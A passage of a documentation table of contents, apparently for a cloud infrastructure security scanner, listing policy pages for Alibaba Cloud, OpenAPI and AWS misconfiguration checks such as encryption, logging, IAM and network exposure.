Trail Logging is not enabled for all events + file: ensure-alibaba-cloud-action-trail-logging-for-all-events.adoc + - name: Alibaba Cloud Action Trail Logging is not enabled for all regions + file: ensure-alibaba-cloud-action-trail-logging-for-all-regions.adoc + - name: Alibaba Cloud OSS bucket has access logging enabled + file: ensure-alibaba-cloud-oss-bucket-has-access-logging-enabled.adoc + - name: Alibaba Cloud RDS Instance SQL Collector Retention Period is less than 180 + file: ensure-alibaba-cloud-rds-instance-sql-collector-retention-period-should-be-greater-than-180.adoc + - name: Alibaba Cloud Transparent Data Encryption is disabled on instance + file: ensure-alibaba-cloud-transparent-data-encryption-is-enabled-on-instance.adoc +- name: Alibaba Networking Policies + dir: alibaba-networking-policies + topics: + - name: Alibaba Networking Policies + file: alibaba-networking-policies.adoc + - name: Alibaba cloud ALB ACL does not restrict public access + file: ensure-alibaba-cloud-alb-acl-restricts-public-access.adoc + - name: Alibaba Cloud API Gateway API Protocol does not use HTTPS + file: ensure-alibaba-cloud-api-gateway-api-protocol-uses-https.adoc + - name: Alibaba Cloud Cypher Policy is not secured + file: ensure-alibaba-cloud-cypher-policy-is-secured.adoc + - name: Alibaba Cloud MongoDB instance is public + file: ensure-alibaba-cloud-mongodb-instance-is-not-public.adoc + - name: Alibaba Cloud Mongodb instance does not use SSL + file: ensure-alibaba-cloud-mongodb-instance-uses-ssl.adoc + - name: Alibaba Cloud MongoDB is not deployed inside a VPC + file: ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc + - name: Alibaba Cloud RDS instance does not use SSL + file: ensure-alibaba-cloud-rds-instance-uses-ssl.adoc + - name: Alibaba Cloud Security group allow internet traffic to SSH port (22) + file: ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc + - name: Alibaba Cloud Security group allow internet traffic to RDP port (3389) + file: ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc +--- +kind: chapter +name: API Policies +dir: api-policies +topics: +- name: API Policies + file: api-policies.adoc +- name: OpenAPI Policies + dir: openapi-policies + topics: + - name: OpenAPI Policies + file: openapi-policies.adoc + - name: OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty + file: ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc + - name: OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error + file: ensure-that-security-operations-is-not-empty.adoc + - name: OpenAPI Security requirement not defined in the security definitions + file: ensure-that-security-requirement-defined-in-securitydefinitions.adoc + - name: Cleartext credentials over unencrypted channel should not be accepted for the operation + file: ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc + - name: OpenAPI Security Definitions Object should be set and not empty + file: ensure-that-securitydefinitions-is-defined-and-not-empty.adoc + - name: OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme + file: ensure-that-the-global-security-field-has-rules-defined.adoc +--- +kind: chapter +name: AWS Policies +dir: aws-policies +topics: +- name: AWS Policies + file: aws-policies.adoc +- name: AWS General Policies + dir: aws-general-policies + topics: + - name: AWS General Policies + file: aws-general-policies.adoc + - name: Autoscaling groups did not supply tags to launch configurations + file: autoscaling-groups-should-supply-tags-to-launch-configurations.adoc + - name: AWS Image Builder component not encrypted using Customer Managed Key + file: bc-aws-general-100.adoc + - name: AWS fx ontap file system not encrypted using Customer Managed Key + file: ensure-fx-ontap-file-system-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS MQBroker audit logging is disabled + file: ensure-aws-mqbroker-audit-logging-is-enabled.adoc + - name: AWS S3 Object Copy not encrypted using Customer Managed Key + file: bc-aws-general-101.adoc + - name: AWS Doc DB not encrypted using Customer Managed Key + file: bc-aws-general-102.adoc + - name: AWS EBS Snapshot Copy not encrypted using Customer Managed Key + file: bc-aws-general-103.adoc + - name: AWS Elastic File System (EFS) is not encrypted using Customer Managed Key + file: bc-aws-general-104.adoc + - name: AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys + file: bc-aws-general-105.adoc + - name: AWS S3 bucket Object not encrypted using Customer Managed Key + file: bc-aws-general-106.adoc + - name: AWS Sagemaker domain not encrypted using Customer Managed Key + file: bc-aws-general-107.adoc + - name: AWS EBS Volume not encrypted using Customer Managed Key + file: bc-aws-general-109.adoc + - name: AWS lustre file system not configured with CMK key + file: bc-aws-general-110.adoc + - name: AWS Elasticache replication group not configured with CMK key + file: bc-aws-general-111.adoc + - name: AWS Kinesis streams are not encrypted using Server Side Encryption + file: bc-aws-general-22.adoc + - name: DAX is not securely encrypted at rest + file: bc-aws-general-23.adoc + - name: ECR image tags are not immutable + file: bc-aws-general-24.adoc + - name: AWS resources that support tags do not have Tags + file: bc-aws-general-26.adoc + - name: AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled + file: bc-aws-general-27.adoc + - name: DocumentDB is not encrypted at rest + file: bc-aws-general-28.adoc + - name: Athena Database is not encrypted at rest + file: bc-aws-general-29.adoc + - name: CodeBuild project encryption is disabled + file: bc-aws-general-30.adoc + - name: AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2) + file: bc-aws-general-31.adoc + - name: MSK cluster encryption at rest and in transit is not enabled + file: bc-aws-general-32.adoc + - name: Athena workgroup does not prevent disabling encryption + file: bc-aws-general-33.adoc + - name: Glue Data Catalog encryption is not enabled + file: bc-aws-general-37.adoc + - name: Not all data stored in Aurora is securely encrypted at rest + file: bc-aws-general-38.adoc + - name: EFS volumes in ECS task definitions do not have encryption in transit enabled + file: bc-aws-general-39.adoc + - name: AWS SageMaker endpoint not configured with data encryption at rest using KMS key + file: bc-aws-general-40.adoc + - name: AWS Glue security configuration encryption is not enabled + file: bc-aws-general-41.adoc + - name: Neptune cluster instance is publicly available + file: bc-aws-general-42.adoc + - name: AWS Load Balancer is not using TLS 1.2 + file: bc-aws-general-43.adoc + - name: AWS Kinesis Video Stream not encrypted using Customer Managed Key + file: bc-aws-general-97.adoc + - name: AWS FSX Windows filesystem not encrypted using Customer Managed Key + file: bc-aws-general-99.adoc + - name: Postgres RDS does not have Query Logging enabled + file: bc-aws-logging-32.adoc + - name: Deletion protection disabled for load balancer + file: bc-aws-networking-62.adoc + - name: AWS QLDB ledger has deletion protection is disabled + file: bc-aws-storage-1.adoc + - name: AWS API Gateway caching is disabled + file: ensure-api-gateway-caching-is-enabled.adoc + - name: AWS ACM certificates does not have logging preference + file: ensure-aws-acm-certificates-has-logging-preference.adoc + - name: AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK) + file: ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc + - name: AWS AMI copying does not use a Customer Managed Key (CMK) + file: ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc + - name: AWS AMI launch permissions are not limited + file: ensure-aws-ami-launch-permissions-are-limited.adoc + - name: AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs) + file: ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc + - name: AWS API deployments do not enable Create before Destroy + file: ensure-aws-api-deployments-enable-create-before-destroy.adoc + - name: AWS API Gateway caching is disabled + file: ensure-aws-api-gateway-caching-is-enabled.adoc + - name: AWS API Gateway Domain does not use a modern security policy + file: ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc + - name: Ensure AWS API gateway enables Create before Destroy + file: ensure-aws-api-gateway-enables-create-before-destroy.adoc + - name: AWS API Gateway method settings do not enable caching + file: ensure-aws-api-gateway-method-settings-enable-caching.adoc + - name: AWS App Flow connector profile does not use Customer Managed Keys (CMKs) + file: ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc + - name: AWS App Flow flow does not use Customer Managed Keys (CMKs) + file: ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc + - name: AWS Appsync API Cache is not encrypted at rest + file: ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc + - name: AWS Appsync API Cache is not encrypted in transit + file: ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc + - name: AWS AppSync has field-level logs disabled + file: ensure-aws-appsync-has-field-level-logs-enabled.adoc + - name: AWS AppSync is not protected by WAF + file: ensure-aws-appsync-is-protected-by-waf.adoc + - name: AWS AppSync's logging is disabled + file: ensure-aws-appsyncs-logging-is-enabled.adoc + - name: AWS Lambda function URL AuthType set to NONE + file: ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc + - name: AWS Batch Job is defined as a privileged container + file: ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc + - name: AWS MQBroker audit logging is disabled + file: ensure-aws-cloudfront-attached-wafv2-webacl-is-configured-with-amr-for-log4j-vulnerability.adoc + - name: AWS Cloudfront distribution is disabled + file: ensure-aws-cloudfront-distribution-is-enabled.adoc + - name: AWS CloudFront response header policy does not enforce Strict Transport Security + file: ensure-aws-cloudfront-response-header-policy-enforces-strict-transport-security.adoc + - name: AWS Cloudsearch does not use HTTPs + file: ensure-aws-cloudsearch-uses-https.adoc + - name: AWS Cloudsearch does not use the latest (Transport Layer Security) TLS + file: ensure-aws-cloudsearch-uses-the-latest-transport-layer-security-tls-1.adoc + - name: AWS CloudTrail does not define an SNS Topic + file: ensure-aws-cloudtrail-defines-an-sns-topic.adoc + - name: AWS CloudTrail logging is disabled + file: ensure-aws-cloudtrail-logging-is-enabled.adoc + - name: AWS cluster logging is not encrypted using a Customer Managed Key (CMK) + file: ensure-aws-cluster-logging-is-encrypted-using-a-customer-managed-key-cmk.adoc + - name: AWS Code Artifact Domain is not encrypted by KMS using a Customer Managed Key (CMK) + file: ensure-aws-code-artifact-domain-is-encrypted-by-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS Codecommit branch changes has less than 2 approvals + file: ensure-aws-codecommit-branch-changes-have-at-least-2-approvals.adoc + - name: AWS Codecommit is not associated with an approval rule + file: ensure-aws-codecommit-is-associated-with-an-approval-rule.adoc + - name: AWS CodePipeline artifactStore is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-codepipeline-artifactstore-is-not-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS Config must record all possible resources + file: ensure-aws-config-must-record-all-possible-resources.adoc + - name: AWS Config Recording is disabled + file: ensure-aws-config-recorder-is-enabled-to-record-all-supported-resources.adoc + - name: AWS copied AMIs are not encrypted + file: ensure-aws-copied-amis-are-encrypted.adoc + - name: AWS DAX cluster endpoint does not use TLS (Transport Layer Security) + file: ensure-aws-dax-cluster-endpoint-uses-transport-layer-security-tls.adoc + - name: AWS DB instance does not get all minor upgrades automatically + file: ensure-aws-db-instance-gets-all-minor-upgrades-automatically.adoc + - name: AWS DLM cross-region events are not encrypted with a Customer Managed Key (CMK) + file: ensure-aws-dlm-cross-region-events-are-encrypted-with-a-customer-managed-key-cmk.adoc + - name: AWS DLM cross-region events are not encrypted + file: ensure-aws-dlm-cross-region-events-are-encrypted.adoc + - name: AWS DLM cross-region schedules are not encrypted using a Customer Managed Key (CMK) + file: ensure-aws-dlm-cross-region-schedules-are-encrypted-using-a-customer-managed-key-cmk.adoc + - name: AWS DLM-cross region schedules are not encrypted + file: ensure-aws-dlm-cross-region-schedules-are-encrypted.adoc + - name: AWS DMS instance does not receive all minor updates automatically + file: ensure-aws-dms-instance-receives-all-minor-updates-automatically.adoc + - name: AWS EBS Volume is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-ebs-volume-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS ECS Cluster does not enable logging of ECS Exec + file: ensure-aws-ecs-cluster-enables-logging-of-ecs-exec.adoc + - name: AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to disabled + file: ensure-aws-elasticache-redis-cluster-with-multi-az-automatic-failover-feature-set-to-enabled.adoc + - name: AWS Elasticsearch domain does not use an updated TLS policy + file: ensure-aws-elasticsearch-domain-uses-an-updated-tls-policy.adoc + - name: AWS FSX openzfs is not encrypted by AWS' Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-fsx-openzfs-file-system-is-encrypted-by-aws-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS Glue component is not associated with a security configuration + file: ensure-aws-glue-component-is-associated-with-a-security-configuration.adoc + - name: AWS GuardDuty detector is enabled + file: ensure-aws-guardduty-detector-is-enabled.adoc + - name: AWS Image Builder Distribution Configuration is not encrypting AMI by Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-image-builder-distribution-configuration-is-encrypting-ami-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS Image Recipe EBS Disk are not encrypted using a Customer Managed Key (CMK) + file: ensure-aws-image-recipe-ebs-disk-are-encrypted-using-a-customer-managed-key-cmk.adoc + - name: AWS Kendra index Server side encryption does not use Customer Managed Keys (CMKs) + file: ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks-1.adoc + - name: AWS HTTP and HTTPS target groups do not define health check + file: ensure-aws-kendra-index-server-side-encryption-uses-customer-managed-keys-cmks.adoc + - name: AWS Key Management Service (KMS) key is disabled + file: ensure-aws-key-management-service-kms-key-is-enabled.adoc + - name: AWS Keyspace Table does not use Customer Managed Keys (CMKs) + file: ensure-aws-keyspace-table-uses-customer-managed-keys-cmks.adoc + - name: AWS Kinesis Firehose Delivery Streams are not encrypted with CMK + file: ensure-aws-kinesis-firehose-delivery-streams-are-encrypted-with-cmk.adoc + - name: AWS Kinesis Firehose's delivery stream is not encrypted + file: ensure-aws-kinesis-firehoses-delivery-stream-is-encrypted.adoc + - name: AWS MemoryDB data is not encrypted in transit + file: ensure-aws-memorydb-data-is-encrypted-in-transit.adoc + - name: AWS MemoryDB is not encrypted at rest by AWS' Key Management Service KMS using CMKs + file: ensure-aws-memorydb-is-encrypted-at-rest-by-aws-key-management-service-kms-using-cmks.adoc + - name: AWS MQBroker is not encrypted by Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-mqbroker-is-encrypted-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS MQBroker version is not up to date + file: ensure-aws-mqbroker-version-is-up-to-date.adoc + - name: AWS MQBroker's minor version updates are disabled + file: ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc + - name: AWS MWAA environment has scheduler logs disabled + file: ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc + - name: AWS MWAA environment has webserver logs disabled + file: ensure-aws-mwaa-environment-has-webserver-logs-enabled.adoc + - name: AWS MWAA environment has worker logs disabled + file: ensure-aws-mwaa-environment-has-worker-logs-enabled.adoc + - name: AWS RDS Cluster activity streams are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs) + file: ensure-aws-rds-cluster-activity-streams-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc + - name: AWS RDS DB snapshot does not use Customer Managed Keys (CMKs) + file: ensure-aws-rds-db-snapshot-uses-customer-managed-keys-cmks.adoc + - name: AWS RDS PostgreSQL exposed to local file read vulnerability + file: ensure-aws-rds-postgresql-instances-use-a-non-vulnerable-version-of-log-fdw-extension.adoc + - name: AWS RDS does not use a modern CaCert + file: ensure-aws-rds-uses-a-modern-cacert.adoc + - name: AWS replicated backups are not encrypted at rest by Key Management Service (KMS) using a Customer Managed Key (CMK) + file: ensure-aws-replicated-backups-are-encrypted-at-rest-by-key-management-service-kms-using-a-customer-managed-key-cmk.adoc + - name: AWS SSM Parameter is not encrypted + file: ensure-aws-ssm-parameter-is-encrypted.adoc + - name: AWS Terraform sends SSM secrets to untrusted domains over HTTP + file: ensure-aws-terraform-does-not-send-ssm-secrets-to-untrusted-domains-over-http.adoc + - name: Backup Vault is not encrypted at rest using KMS CMK + file: ensure-backup-vault-is-encrypted-at-rest-using-kms-cmk.adoc + - name: DocDB does not have audit logs enabled + file: ensure-docdb-has-audit-logs-enabled.adoc + - name: Dynamodb point in time recovery is not enabled for global tables + file: ensure-dynamodb-point-in-time-recovery-is-enabled-for-global-tables.adoc + - name: AWS EBS volume region with encryption is disabled + file: ensure-ebs-default-encryption-is-enabled.adoc + - name: AWS EMR cluster is not configured with SSE KMS for data at rest encryption (Amazon S3 with EMRFS) + file: ensure-emr-cluster-security-configuration-encryption-uses-sse-kms.adoc + - name: Glacier Vault access policy is public and not restricted to specific services or principals + file: ensure-glacier-vault-access-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc + - name: Ensure Glue component has a security configuration associated + file: ensure-glue-component-has-a-security-configuration-associated.adoc + - name: GuardDuty is not enabled to specific org/region + file: ensure-guardduty-is-enabled-to-specific-orgregion.adoc + - name: AWS Postgres RDS have Query Logging disabled + file: ensure-postgres-rds-has-query-logging-enabled.adoc + - name: Provisioned resources are manually modified + file: ensure-provisioned-resources-are-not-manually-modified.adoc + - name: QLDB ledger permissions mode is not set to STANDARD + file: ensure-qldb-ledger-permissions-mode-is-set-to-standard-1.adoc + - name: AWS Redshift does not have require_ssl configured + file: ensure-redshift-uses-ssl.adoc + - name: Route53 A Record does not have Attached Resource + file: ensure-route53-a-record-has-an-attached-resource.adoc + - name: Session Manager data is not encrypted in transit + file: ensure-session-manager-data-is-encrypted-in-transit.adoc + - name: Deletion protection disabled for load balancer + file: ensure-session-manager-logs-are-enabled-and-encrypted.adoc + - name: SNS topic policy is public and access is not restricted to specific services or principals + file: ensure-sns-topic-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc + - name: SQS queue policy is public and access is not restricted to specific services or principals + file: ensure-sqs-queue-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it.adoc + - name: Amazon ElastiCache Redis clusters do not have automatic backup turned on + file: ensure-that-amazon-elasticache-redis-clusters-have-automatic-backup-turned-on.adoc + - name: Athena Workgroup is not encrypted + file: ensure-that-athena-workgroup-is-encrypted.adoc + - name: DynamoDB Tables do not have Auto Scaling enabled + file: ensure-that-auto-scaling-is-enabled-on-your-dynamodb-tables.adoc + - name: AWS Lambda function is not configured for a DLQ + file: ensure-that-aws-lambda-function-is-configured-for-a-dead-letter-queue-dlq.adoc + - name: AWS Lambda function is not configured for function-level concurrent execution Limit + file: ensure-that-aws-lambda-function-is-configured-for-function-level-concurrent-execution-limit.adoc + - name: AWS Lambda Function is not assigned to access within VPC + file: ensure-that-aws-lambda-function-is-configured-inside-a-vpc-1.adoc + - name: AWS CloudWatch Log groups encrypted using default encryption key instead of KMS CMK + file: ensure-that-cloudwatch-log-group-is-encrypted-by-kms.adoc + - name: CodeBuild projects are not encrypted + file: ensure-that-codebuild-projects-are-encrypted-1.adoc + - name: Unencrypted DynamoDB Tables + file: ensure-that-dynamodb-tables-are-encrypted.adoc + - name: EBS does not have an AWS Backup backup plan + file: ensure-that-ebs-are-added-in-the-backup-plans-of-aws-backup.adoc + - name: EC2 EBS is not optimized + file: ensure-that-ec2-is-ebs-optimized.adoc + - name: Unencrypted ECR repositories + file: ensure-that-ecr-repositories-are-encrypted.adoc + - name: Amazon EFS does not have an AWS Backup backup plan + file: ensure-that-elastic-file-system-amazon-efs-file-systems-are-added-in-the-backup-plans-of-aws-backup.adoc + - name: Elastic load balancers do not use SSL Certificates provided by AWS Certificate Manager + file: ensure-that-elastic-load-balancers-uses-ssl-certificates-provided-by-aws-certificate-manager.adoc + - name: AWS EMR cluster is not configured with Kerberos Authentication + file: ensure-that-emr-clusters-have-kerberos-enabled.adoc + - name: Not only encrypted EBS volumes are attached to EC2 instances + file: ensure-that-only-encrypted-ebs-volumes-are-attached-to-ec2-instances.adoc + - name: AWS RDS cluster delete protection is disabled + file: ensure-that-rds-clusters-and-instances-have-deletion-protection-enabled.adoc + - name: RDS clusters do not have an AWS Backup backup plan + file: ensure-that-rds-clusters-has-backup-plan-of-aws-backup.adoc + - name: AWS RDS DB snapshot is not encrypted + file: ensure-that-rds-database-cluster-snapshot-is-encrypted-1.adoc + - name: Unencrypted RDS global clusters + file: ensure-that-rds-global-clusters-are-encrypted.adoc + - name: AWS RDS instance without Automatic Backup setting + file: ensure-that-rds-instances-have-backup-policy.adoc + - name: AWS Redshift Cluster not encrypted using Customer Managed Key + file: ensure-that-redshift-cluster-is-encrypted-by-kms.adoc + - name: Redshift clusters version upgrade is not default + file: ensure-that-redshift-clusters-allow-version-upgrade-by-default.adoc + - name: S3 bucket cross-region replication disabled + file: ensure-that-s3-bucket-has-cross-region-replication-enabled.adoc + - name: S3 bucket lock configuration disabled + file: ensure-that-s3-bucket-has-lock-configuration-enabled-by-default.adoc + - name: S3 buckets are not encrypted with KMS + file: ensure-that-s3-buckets-are-encrypted-with-kms-by-default.adoc + - name: AWS Secrets Manager secret is not encrypted using KMS CMK + file: ensure-that-secrets-manager-secret-is-encrypted-using-kms.adoc + - name: AWS Secrets Manager secret is not encrypted using KMS CMK + file: ensure-that-secrets-manager-secret-is-encrypted-using-kms.adoc + - name: Timestream database is not encrypted with KMS CMK + file: ensure-that-timestream-database-is-encrypted-with-kms-cmk.adoc + - name: Workspace root volumes are not encrypted + file: ensure-that-workspace-root-volumes-are-encrypted.adoc + - name: Workspace user volumes are not encrypted + file: ensure-that-workspace-user-volumes-are-encrypted.adoc + - name: AWS ElastiCache Redis cluster with in-transit encryption disabled (Replication group) + file: general-10.adoc + - name: AWS ElastiCache Redis cluster with Redis AUTH feature disabled + file: general-11.adoc + - name: EBS volumes do not have encrypted launch configurations + file: general-13.adoc + - name: AWS SageMaker notebook instance not configured with data encryption at rest using KMS key + file: general-14.adoc + - name: AWS SNS topic has SSE disabled + file: general-15.adoc + - name: AWS SQS Queue not configured with server side encryption + file: general-16-encrypt-sqs-queue.adoc + - name: AWS Elastic File System (EFS) with encryption for data at rest is disabled + file: general-17.adoc + - name: Neptune storage is not securely encrypted + file: general-18.adoc + - name: AWS Redshift instances are not encrypted + file: general-25.adoc + - name: AWS EBS volumes are not encrypted + file: general-3-encrypt-ebs-volume.adoc + - name: AWS RDS DB cluster encryption is disabled + file: general-4.adoc + - name: DynamoDB PITR is disabled + file: general-6.adoc + - name: Not all data stored in the EBS snapshot is securely encrypted + file: general-7.adoc + - name: RDS instances do not have Multi-AZ enabled + file: general-73.adoc + - name: ECR image scan on push is not enabled + file: general-8.adoc + - name: AWS ElastiCache Redis cluster with encryption for data at rest disabled + file: general-9.adoc + - name: AWS provisioned resources are manually modified + file: ensure-provisioned-resources-are-not-manually-modified.adoc +- name: Elastisearch Policies + dir: elastisearch-policies + topics: + - name: Elastisearch Policies + file: elastisearch-policies.adoc + - name: AWS Elasticsearch domain Encryption for data at rest is disabled + file: elasticsearch-3-enable-encryptionatrest.adoc + - name: AWS Elasticsearch does not have node-to-node encryption enabled + file: elasticsearch-5.adoc + - name: AWS Elasticsearch domain is not configured with HTTPS + file: elasticsearch-6.adoc + - name: AWS Elasticsearch domain logging is not enabled + file: elasticsearch-7.adoc +- name: AWS IAM Policies + dir: aws-iam-policies + topics: + - name: AWS IAM Policies + file: aws-iam-policies.adoc + - name: AWS IAM policy documents do not allow * (asterisk) as a statement's action + file: bc-aws-iam-43.adoc + - name: AWS IAM role allows all services or principals to be assumed + file: bc-aws-iam-44.adoc + - name: AWS IAM policy does allow assume role permission across all services + file: bc-aws-iam-45.adoc + - name: AWS SQS queue access policy is overly permissive + file: bc-aws-iam-46.adoc + - name: AWS EC2 Instance IAM Role not enabled + file: ensure-an-iam-role-is-attached-to-ec2-instance.adoc + - name: IAM User has access to the console + file: ensure-an-iam-user-does-not-have-access-to-the-console-group.adoc + - name: AWS Cloudfront Distribution with S3 have Origin Access set to disabled + file: ensure-aws-cloudfromt-distribution-with-s3-have-origin-access-set-to-enabled.adoc + - name: Credentials exposure actions return credentials in an API response + file: ensure-iam-policies-do-not-allow-credentials-exposure.adoc + - name: Data exfiltration allowed without resource constraints + file: ensure-iam-policies-do-not-allow-data-exfiltration.adoc + - name: Resource exposure allows modification of policies and exposes resources + file: ensure-iam-policies-do-not-allow-permissions-management-resource-exposure-without-constraint.adoc + - name: Write access allowed without constraint + file: ensure-iam-policies-do-not-allow-write-access-without-constraint.adoc + - name: IAM policies allow privilege escalation + file: ensure-iam-policies-does-not-allow-privilege-escalation.adoc + - name: AWS KMS Key policy overly permissive + file: ensure-kms-key-policy-does-not-contain-wildcard-principal.adoc + - name: AWS RDS cluster not configured with IAM authentication + file: ensure-rds-cluster-has-iam-authentication-enabled.adoc + - name: RDS database does not have IAM authentication enabled + file: ensure-rds-database-has-iam-authentication-enabled.adoc + - name: AWS S3 buckets are accessible to any authenticated user + file: ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users.adoc + - name: Not all IAM users are members of at least one IAM group + file: ensure-that-all-iam-users-are-members-of-at-least-one-iam-group.adoc + - name: IAM authentication for Amazon RDS clusters is disabled + file: ensure-that-an-amazon-rds-clusters-have-iam-authentication-enabled.adoc + - name: IAM groups do not include at least one IAM user + file: ensure-that-iam-groups-include-at-least-one-iam-user.adoc + - name: Respective logs of Amazon RDS are disabled + file: ensure-that-respective-logs-of-amazon-relational-database-service-amazon-rds-are-enabled.adoc + - name: AWS Execution Role ARN and Task Role ARN are different in ECS Task definitions + file: ensure-the-aws-execution-role-arn-and-task-role-arn-are-different-in-ecs-task-definitions.adoc + - name: AWS IAM password policy does allow password reuse + file: iam-10.adoc + - name: AWS IAM password policy does not expire in 90 days + file: iam-11.adoc + - name: AWS IAM policy attached to users + file: iam-16-iam-policy-privileges-1.adoc + - name: AWS IAM policies that allow full administrative privileges are created + file: iam-23.adoc + - name: AWS IAM policy documents allow * (asterisk) as a statement's action + file: iam-48.adoc + - name: AWS IAM password policy does not have an uppercase character + file: iam-5.adoc + - name: AWS IAM password policy does not have a lowercase character + file: iam-6.adoc + - name: AWS IAM password policy does not have a symbol + file: iam-7.adoc + - name: AWS IAM password policy does not have a number + file: iam-8.adoc + - name: AWS IAM password policy does not have a minimum of 14 characters + file: iam-9-1.adoc +- name: AWS Kubernetes Policies + dir: aws-kubernetes-policies + topics: + - name: AWS Kubernetes Policies + file: aws-kubernetes-policies.adoc + - name: AWS EKS cluster security group is overly permissive to all traffic + file: bc-aws-kubernetes-1.adoc + - name: AWS EKS cluster endpoint access publicly enabled + file: bc-aws-kubernetes-2.adoc + - name: AWS EKS cluster does not have secrets encryption enabled + file: bc-aws-kubernetes-3.adoc + - name: AWS EKS control plane logging disabled + file: bc-aws-kubernetes-4.adoc + - name: AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 + file: bc-aws-kubernetes-5.adoc +- name: AWS Logging Policies + dir: aws-logging-policies + topics: + - name: AWS Logging Policies + file: aws-logging-policies.adoc + - name: Amazon MQ Broker logging is not enabled + file: bc-aws-logging-10.adoc + - name: AWS ECS cluster with container insights feature disabled + file: bc-aws-logging-11.adoc + - name: AWS Redshift database does not have audit logging enabled + file: bc-aws-logging-12.adoc + - name: AWS Elastic Load Balancer v2 (ELBv2) with access log disabled + file: bc-aws-logging-22.adoc + - name: AWS Elastic Load Balancer (Classic) with access log disabled + file: bc-aws-logging-23.adoc + - name: Neptune logging is not enabled + file: bc-aws-logging-24.adoc + - name: AWS WAF Web Access Control Lists logging is disabled + file: bc-aws-logging-31.adoc + - name: AWS WAF2 does not have a Logging Configuration + file: bc-aws-logging-33.adoc + - name: API Gateway stage does not have logging level defined appropriately + file: ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc + - name: CloudTrail trail is not integrated with CloudWatch Log + file: ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc + - name: AWS Postgres RDS have Query Logging disabled + file: ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc + - name: AWS CloudFormation stack configured without SNS topic + file: ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc + - name: AWS EC2 instance detailed monitoring disabled + file: ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc + - name: AWS Amazon RDS instances Enhanced Monitoring is disabled + file: ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc + - name: AWS CloudTrail is not enabled with multi trail and not capturing all management events + file: logging-1.adoc + - name: AWS CloudWatch Log groups not configured with definite retention days + file: logging-13.adoc + - name: API Gateway does not have X-Ray tracing enabled + file: logging-15.adoc + - name: Global Accelerator does not have Flow logs enabled + file: logging-16.adoc + - name: API Gateway does not have access logging enabled + file: logging-17.adoc + - name: Amazon MSK cluster logging is not enabled + file: logging-18.adoc + - name: AWS DocumentDB logging is not enabled + file: logging-19.adoc + - name: AWS CloudTrail log validation is not enabled in all regions + file: logging-2.adoc + - name: AWS CloudFront distribution with access logging disabled + file: logging-20.adoc + - name: AWS config is not enabled in all regions + file: logging-5-enable-aws-config-regions.adoc + - name: AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs) + file: logging-7.adoc + - name: AWS Customer Master Key (CMK) rotation is not enabled + file: logging-8.adoc + - name: AWS VPC Flow Logs not enabled + file: logging-9-enable-vpc-flow-logging.adoc +- name: AWS Networking Policies + dir: aws-networking-policies + topics: + - name: AWS Networking Policies + file: aws-networking-policies.adoc + - name: DocDB TLS is disabled + file: bc-aws-networking-37.adoc + - name: AWS CloudFront web distribution using insecure TLS version + file: bc-aws-networking-63.adoc + - name: AWS WAF does not have associated rules + file: bc-aws-networking-64.adoc + - name: AWS CloudFront distribution does not have a strict security headers policy attached + file: bc-aws-networking-65.adoc + - name: AWS ACM certificate does not enable Create before Destroy + file: ensure-aws-acm-certificate-enables-create-before-destroy.adoc + - name: AWS CloudFront web distribution with default SSL certificate + file: ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc + - name: AWS Database Migration Service endpoint do not have 